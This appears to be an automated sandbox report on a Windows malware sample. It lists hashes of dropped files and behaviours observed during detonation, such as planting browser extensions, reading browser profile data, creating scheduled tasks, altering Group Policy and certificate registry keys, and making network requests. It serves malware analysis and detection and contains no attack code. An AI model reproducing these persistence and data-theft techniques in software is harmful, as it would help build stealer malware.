SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 076dee9a0e7f704f50435a860ef61ffc
SHA1 71bfb3f8905b3c81698ce82e5fe37097dd9b9d7c
SHA256 153089f4c44b875138ca8d7bbfe3fc6817173c18afa9c44391aad496957c29de
SHA512 f494671a802d512087f3c814f581e986f884d83605f642fbf9493d3ca39ce3005436bd25990085dd4e2e2b3a506765f3ef453f8e4a50b686c4cea14b9208ccc6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\qBvbbKpBU\cLAALdr.xml

MD5 e39c8d0dd1079cca53d6c57fe6bdc6ff
SHA1 6f4a06efec1438b497375a8133608b13aa548c08
SHA256 4989fc14ec0613b2733ac0a282a14ff90d718d2294fa97a404fd4a7b1ecc66a2
SHA512 7fc3eebc6809449c0be6f9504e55a1089dc74042da698506585d377d1751f3fec7d5f8644f5fee0e4ccd3b8e83a230f62561f8cf4551b43602c449e34947ceb2

C:\Program Files (x86)\fZHZowTYSgfU2\jQhmmpX.xml

MD5 4bc21c459267502c6c33ca9fb9d4fc6f
SHA1 e6a126ea288b4482386108a644da9d7a19af444d
SHA256 a65017400cac13d1e1224e32fcb7b0c127556952ee59e30521a1bd1a6c740948
SHA512 7dac3898959abc5c62b0c9156074312060051a4dd5b30ec2b857b579cfbbc04ed7fa1f1dc8e959bb1b255f2d52f917ecf1fc5f8b5283e8d3807891629d43d730

C:\ProgramData\nxeoDZreGracWIVB\ihclmox.xml

MD5 6d31d41e95b2986f8912f2f2de352c4a
SHA1 3754820c61fe36f9bea0475030c7c3eca06ac5a9
SHA256 e7fd271fe3718e9a657a9afc2826ab1c5e9b2543cf70bd73df192f47558f57c7
SHA512 b41629876b22d8ed837f0fa6c16c79022d0deef7e009192810dbaf3a29a6bfeed258605a87ceda752c766fb1d2f2ec8540e164de43a76ccce3e6804caea4da04

C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\QKJRxWV.xml

MD5 e2efd03f03c31e53a7a822f50dc92f43
SHA1 d467728cde80c4004894746837958523ada0fd42
SHA256 e14481071695fd3209193f80960a38f951cb555dc3b7c3f958862de0426d9ee9
SHA512 acc0ddcf763557c817037912183f2a36e2fc1ad82d98cbcaed2be0e1e3bc4e58899c59785d33dca36ff24250af44c258ed6c20f9e3ef117b92fbaa59dc29ed50

C:\Program Files (x86)\epUZFeichsCPC\zcKfbEk.xml

MD5 8f9aff00135e04088031da82de0a386d
SHA1 5f05cc1ed111ba27cca1f7c335a551c886bb88c6
SHA256 fcf74949f31390b2766076e5140cbcdc6f9169f7dd47bc0d0bd4def5dd8d5acc
SHA512 d87c8bbfa3eee99e25242bd3df503685865e56eeafa9c78609cf6ac390120aeb8b785781e13d16c9a1abbd4305bea7c82b8c280de72e345c2941e5ca2a8f797d

C:\Windows\Temp\JHEwijpMlSQrgvQB\UuWunfYY\ZPQQAfy.dll

MD5 44f3948cb32c3b8df1fca5ef30116aa0
SHA1 c674b72e1e1058d0e29d555abc09d40f0c7c8a0c
SHA256 12cd48a7e59081b04ad77863bdfc946ecaeccede9368f6410e05c80ee526a0fe
SHA512 09d5de6251c88e853132bc8455f2da4d4922a9059778c5103652da3420cd7f98de983f6e3e9ebbe201bd520ac6dbff4cc95b7f01cf6ea335b05671f99649b5b0

memory/2312-498-0x00000000034E0000-0x000000000356A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\prefs.js

MD5 d30083b46c8d9ef8b9b2a5954d7cd817
SHA1 3ee0b8c0a63cf23ef95032abd3f9196ebe92b959
SHA256 7fd0d0189bb8f2a0e69f20a4779f9aa62e5be34ee8d7f7d36ed57cb20fe7b39e
SHA512 bdf1c706cabe924c536851d46d25e3f80b4375dc2d4cb0512e06479a1687af441a8927d1ead39d1ea366450e0fc90afe32f91df9bac6856f7caf79e193f2dde5

memory/2312-513-0x0000000003740000-0x0000000003822000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1e68ec0e702e6fcb1ccbd99161309da8
SHA1 7d3a9e224a190905ab049b486c550e322e9c4e45
SHA256 5eef7c37132b0d97bd34ed02472f4a511fc51d596e59dac13660558969f1a84f
SHA512 d4a8f4048234fe732b73921d5d29bd60757a90c269942de06d78b27b0f0e0e7f725c754427bb289a3a084cc01a1878d673e028f8d1f40d8739e1065c54b44467

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 6b92d7b0714ab723c5a2349817db1c8e
SHA1 29b9a1f81f37997a4cb1bb6b11051baea6cd61f1
SHA256 42bea5206bdb913936a43ee19796f4a9c5529c4f752390621b12045ce5c3e47e
SHA512 5a9f61b1a14e99d1eb685e56a7c44c2caa6f446c9986d34557d989bc267892568dc3cec684ac9d7d2a4a842658100e5bc79c6d4d36516f78dd848569b3a5eb79

memory/384-516-0x00000000029D0000-0x000000000751C000-memory.dmp

memory/3880-571-0x0000000000740000-0x0000000000DFA000-memory.dmp

memory/2312-573-0x00000000002B0000-0x000000000096A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-06 05:00

Reported

2024-04-06 05:03

Platform

win11-20240221-en

Max time kernel

111s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\fZHZowTYSgfU2\vZajwhU.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\KSFvtct.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\wTDcpw.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\LlqHhEU.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\eYzHLaL.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\MxgcLGb.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\VDiAXGzPiWUn\rbfpUFv.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\xQnaRLd.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
File created C:\Program Files (x86)\fZHZowTYSgfU2\GwwTbDGcupmwL.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bpJjqbWMDOjxkYrvBb.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\MWViHNuTpmRlpInKg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\wbeMFPOaxEodGIM.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
